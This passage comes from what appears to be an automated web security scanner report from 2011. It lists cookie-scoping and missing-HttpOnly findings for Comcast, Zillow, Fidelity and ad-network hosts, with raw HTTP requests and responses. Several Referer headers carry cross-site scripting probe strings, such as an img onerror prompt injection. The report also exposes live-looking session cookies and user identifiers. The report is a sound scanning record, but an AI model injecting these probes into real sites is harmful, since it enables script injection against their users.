Set-Cookie: RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; domain=.reachlocal.net; path=/
Set-Cookie: RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1; domain=.reachlocal.net; path=/
Location: /index.html
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 264
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:16:59 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="/index.html">here</a>.</p>
<hr>
<address>Apache
...[SNIP]...

9.50. http://www.burstnet.com/enlightn/8117/3E06/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /enlightn/8117/3E06/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /enlightn/8117/3E06/?01AD=3wa8tKA-mJ3zLI8brmO_1mZLAnzwl8-A9kddOUsNi9p23gomEmKZ1zA&01RI=F72DD362342178E&01NA= HTTP/1.1
Host: www.burstnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myfitv.com/search?query=XS%EF%BF%BDdace;alert(1)//back
Cookie: TID=174q04v1muc3qi; CMP=1AF.1GYo^19q.1GYo; 56Q8=CT-1

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Tue, 06 Sep 2011 12:55:53 GMT
Content-Length: 43
Connection: close
Set-Cookie: 56Q8=3wa8tKA-mJ3zLI8brmO_1mZLAnzwl8-A9kddOUsNi9p23gomEmKZ1zA; expires=Tue, 04-Oct-2011 12:55:53 GMT; path=/; domain=.www.burstnet.com
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=1AF.1GYo^19q.1Gbq; path=/; expires=Thu, 06-Sep-2012 12:55:52 GMT; domain=.burstnet.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

GIF89a.............!.......,...........D..;

9.51. https://www.comcast.com/Localization/Localize.cspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.comcast.com
Path:   /Localization/Localize.cspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Localization/Localize.cspx?Referer=%2FShop%2FBuyFlow2%2Fproducts.cspx&SourcePage=Bundled&FormName=AddressOrZipCode&StreetName=&AptNumber=&Zip= HTTP/1.1
Host: www.comcast.com
Connection: keep-alive
Referer: http://www.comcast.com/Movers/Move.cspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_comcastcom_VIP1=3882506052.20480.0000; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; BIGipServerpool_comcastcom-VIP2=137228613.20480.0000; UserID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; bn_u=6923713561343025788; mbox=session#1315327839174-766376#1315331733|PC#1315327839174-766376.19#1316539473|check#true#1315329933; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329871911'%255D%255D%7C1473182671911%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331673649%3B%20gpv_07%3Dcorporate%2520-%2520customers%2520-%2520custcare%2520%7C1315331673661%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; fsr.s={"v":1,"pv":6,"lc":{"d0":{"v":6,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Length: 24713
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445&SegmentationMode=TargusA; domain=comcast.com; path=/
Date: Tue, 06 Sep 2011 12:24:44 GMT
Connection: Keep-Alive
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <script type="tex
...[SNIP]...

9.52. http://www.zillow.com/app

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zillow.com
Path:   /app

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /app?chartDuration=1year&chartType=partner&cityRegionId=0&countyRegionId=0&height=140&nationRegionId=102001&neighborhoodRegionId=0&page=webservice%2FGetRegionChart&service=chart&showNation=true&stateRegionId=0&width=268&zipRegionId=0 HTTP/1.1
Host: www.zillow.com
Proxy-Connection: keep-alive
Referer: http://realestate.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:19 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.3SP1 (build: CVSTag=JBoss_4_0_3_SP1 date=200510231054)/Tomcat-5.5
X-Internal-Host: 216
X-Requested-Session: D96C22773BC539FD5BC226F64BB0D4A5
Expires: Wed, 07 Sep 2011 10:00:00 GMT
Cache-Control: no-cache
Content-Type: image/gif
Set-Cookie: abtest=1|SearchUnused1%3D94%3AHDPFilmStrip%3D68%3AHDPFinanceModule%3D78%3ABlank%3D73%3AComboLoader%3D36%3ABALSelection%3D8%3ATNCWidgetViewType%3D63%3AMobileBALTest%3D6%3ABALTest%3D83%3AZMMHomepageUpsell%3D85; Domain=.zillow.com; Expires=Mon, 06-Sep-2021 00:45:19 GMT; Path=/
Via: 1.1 www.zillow.com
Vary: User-Agent
Content-Length: 3878

GIF87a....................f.RRR.........................................................................................................................................................................
...[SNIP]...

10. Cookie without HttpOnly flag set
There are 132 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



10.1. http://ads.adxpose.com/ads/ads.js

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ads.adxpose.com
Path:   /ads/ads.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/ads.js?uid=TVYMYp4lQTRs9JsS_40986728 HTTP/1.1
Host: ads.adxpose.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/80181/197812/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ec39c893-8f48-41a8-9b1f-be5afaba100a

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=539A6F0FF4C404245821CD09D3C3964E; Path=/
ETag: "20773-gzip"
Cache-Control: must-revalidate, max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:59 GMT
Content-Length: 11839

if(typeof __ADXPOSE_CONTAINERS__==="undefined"){__ADXPOSE_CONTAINERS__={}}if(typeof __ADXPOSE_EVENT_QUEUES__==="undefined"){__ADXPOSE_EVENT_QUEUES__={}}if(typeof __adxpose__getOffset__==="undefined"){
...[SNIP]...

10.2. http://event.adxpose.com/event.flow

Summary

Severity:   Low
Confidence:   Firm
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fober.frontier%2Fproduct_undefined%3Bdc_seed%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D8383746361359954%3F&uid=TVYMYp4lQTRs9JsS_40986728&xy=0%2C0&wh=300%2C250&vchannel=41471866&cid=3941858&iad=1315331134985-48379358672536910&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.3&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/80181/197812/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ec39c893-8f48-41a8-9b1f-be5afaba100a

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=87AC969D42D890DD653C91255184546D; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 106
Date: Tue, 06 Sep 2011 12:45:59 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("TVYMYp4lQTRs9JsS_40986728");

10.3. http://pixel.everesttech.net/2565/c

Summary

Severity:   Low
Confidence:   Firm
Host:   http://pixel.everesttech.net
Path:   /2565/c

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /2565/c?ev_ct=d&ev_sid=54&ev_ci=1660002714&ev_ai=1660082513&ev_cri=1660643811&url=http%3A//landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/%3Futm_source%3Dyhofin%26utm_medium%3Dpaid-banner-ads%26utm_campaign%3D120x60-QuotesBttn%26utm_content%3Dstock%3AoldGrnBlk HTTP/1.1
Host: pixel.everesttech.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15srre13t/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sGXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=1/X=3/*;ord=1315313295039208?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gglck=zqROZUBXyFQAAIdR; everest_session_v2=AXNOZhaIGXMAAIM3; everest_g_v2=g_surferid~zqROZUBXyFQAAIdR

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:48:34 GMT
Server: Apache
Set-Cookie: everest_session_v2=AXNOZhaIGXMAAIM3; path=/; domain=.everesttech.net
Set-Cookie: everest_g_v2=g_surferid~zqROZUBXyFQAAIdR; path=/; domain=.everesttech.net; expires=Tue, 10-Sep-2030 23:28:34 GMT
P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM"
Cache-Control: no-cache
Location: http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/?utm_source=yhofin&utm_medium=paid-banner-ads&utm_campaign=120x60-QuotesBttn&utm_content=stock:oldGrnBlk
Content-Length: 364
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://landing.optionshouse.com/rate/395/yhofin
...[SNIP]...

10.4. http://pixel.everesttech.net/2565/i

Summary

Severity:   Low
Confidence:   Firm
Host:   http://pixel.everesttech.net
Path:   /2565/i

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /2565/i?ev_sid=54&ev_ci=1660002714&ev_ai=1660082513&ev_cri=1660643811 HTTP/1.1
Host: pixel.everesttech.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15uql37a6/M=601454399.602194378.673385551.687570551/D=fin/S=2142000625:FB2/Y=YAHOO/EXP=1315320486/L=Dzb.VEPDkjnpARpjTl.wjQBoMhd7ak5mFoUADygs/B=n9rGPtGDJHI-/J=1315313286070877/K=URqeTfr3zDD1947mBh5eOA/A=2892168919546073312/R=1/X=3/*;ord=1315313286070877?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: gglck=zqROZUBXyFQAAIdR; everest_g_v2=g_surferid~zqROZUBXyFQAAIdR

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:09 GMT
Server: Apache
Set-Cookie: everest_session_v2=AXNOZhaIGXMAAIM3; path=/; domain=.everesttech.net
Set-Cookie: everest_g_v2=g_surferid~zqROZUBXyFQAAIdR; path=/; domain=.everesttech.net; expires=Tue, 10-Sep-2030 23:28:09 GMT
P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM"
Cache-Control: no-cache
Vary: X-EF-Forwarded-For,Cookie,Host
Last-Modified: Tue, 22 Mar 2011 22:39:33 GMT
ETag: "2051142-80-49f19eb07d340"
Accept-Ranges: bytes
Content-Length: 128
Content-Type: image/png

.PNG
.
...IHDR.....................bKGD.............    pHYs...........~.....tIME......).......IDATx.c````........E@....IEND.B`.

10.5. http://sales.liveperson.net/visitor/addons/deploy.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://sales.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy.asp?site=21807557&d_id=scottrade HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/online-trading.html?cid=AM|46|1542|1206|131&rid=L|1736690&amvid=OPT_OUT&symbol=SPY
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315262431881

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:53 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT
Content-Length: 2124
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDSQDBATSC=GHOHMFOBJJMKFFOJFIKJLOAA; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 21807557
lpAddMonitorTag();
typeof lpMTagConfig!="undefined"&&function(a){lpMTagConfig.isMobile=!1;if(/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(ho
...[SNIP]...

10.6. https://www.fidelity.com/welcome/200-free-trades

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.fidelity.com
Path:   /welcome/200-free-trades

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /welcome/200-free-trades HTTP/1.1
Host: www.fidelity.com
Connection: keep-alive
Referer: http://adserver.teracent.net/tase/ad?AdBoxType=49&url=fidelity.yahoo.buttons&inv=yaptenc&adId=t_798137&CustomQuery=lineid%3D207575051%26position%3D1215986051%26site%3Dfinance.yahoo.com&esc=0&rnd=826091&rcu=http://global.ard.yahoo.com/SIG=15sdkf265/M=601846039.602985816.859733051.859733051/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=smXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=3692525337737555437/R=0/X=3/*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC=90Vi^mj6PDU08DaQWofS_WBSF08SAk5mFqEKAyjtIAApBQACqjMGBAAAAQAGBU5mFqEAP03

Response

HTTP/1.1 200 OK
Server: FWS/7.0
P3p: CP="UNI DEM GOV FIN STA COM NAV PRE INT ONL CUR ADM DEV PSA PSD CUSi IVDi IVAi TELi CONi TAI OUR OTRi"
X-ua-compatible: IE=EmulateIE7
Content-Length: 27674
Content-Type: text/html;charset=ISO-8859-1
Fsreqid: REQ4e6616b80a0328ee200040e30004aa33
Fscalleeid: fidweb321
Fselapsedtime: 64690
Date: Tue, 06 Sep 2011 12:48:56 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: JSESSIONID=0857CAA8FA2A66D639C8268989A40DB3; path=/


...[SNIP]...

10.7. http://www.frontierhelp.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.frontierhelp.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (ARPT, CFID and CFTOKEN in the response below). The cookies that appear to contain session tokens may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.frontierhelp.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: ARPT=RNLPJJS10.160.118.41T0x0000000e_0xc7da91deCMYUJ; expires=Thu, 6-Sep-2012 12:45:15 GMT; path=/
Connection: close
Date: Tue, 06 Sep 2011 12:45:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=2324395;expires=Thu, 29-Aug-2041 12:45:20 GMT;path=/
Set-Cookie: CFTOKEN=20838155;expires=Thu, 29-Aug-2041 12:45:20 GMT;path=/
location: /frontiercare
Content-Type: text/html; charset=UTF-8


10.8. http://www.whitefence.com/a

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.whitefence.com
Path:   /a

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (PHPSESSID in the response below). The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /a HTTP/1.1
Host: www.whitefence.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/high-speed-internet23bef%22%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3Eaffc43fb5c2/

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 06 Sep 2011 12:02:30 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=b5g3jlvu9jqg4vvgfhk6r1grh3; path=/
Pragma: no-cache
Location: http://www2.whitefence.com/a
Content-Type: text/html
Content-Length: 0


10.9. http://40.xg4ken.com/media/redir.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://40.xg4ken.com
Path:   /media/redir.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (kenshoo_id in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/redir.php?prof=85&camp=2140&affcode=kw94444&cid=13569521491&networkType=search&url[]=http%3A%2F%2Fwww.whitefence.com%2Fcategory%2Fhome-phone%2F HTTP/1.1
Host: 40.xg4ken.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:51:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564; expires=Mon, 05-Dec-2011 11:51:52 GMT; path=/; domain=.xg4ken.com
Location: http://www.whitefence.com/category/home-phone/
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


10.10. http://ad.agkn.com/iframe!t=1129!

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1129!

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /iframe!t=1129!?che=352364418348669671&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABuUqUAAAAAAKWdKAAAAAAAAgAAAAIAAAAAAP8AAAADCN0EHgAAAAAAuvUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIcpieZfquClGnlVB5pUrT9u2-xRkxs4YU-KuXAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p48ptjt%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320324%2FL%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%2FB%3DihhvQUoGYno-%2FJ%3D1315313124134052%2FK%3DMkO1E30KWMQ9OU8J05I8pg%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331124066%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%26_salt%3D1837163325%26cb%3D1315313124134052%26i%3D140469%26r%3D0,173ccec4-d886-11e0-a614-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:49 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=""; Version=1; Domain=.agkn.com; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 722
Date: Tue, 06 Sep 2011 12:45:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...

10.11. http://ad.agkn.com/iframe!t=1131!

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1131!

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (uuid in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /iframe!t=1131!?che=344272482798721733&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=344272482798721733&mt_id=126413&mt_adid=101060&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
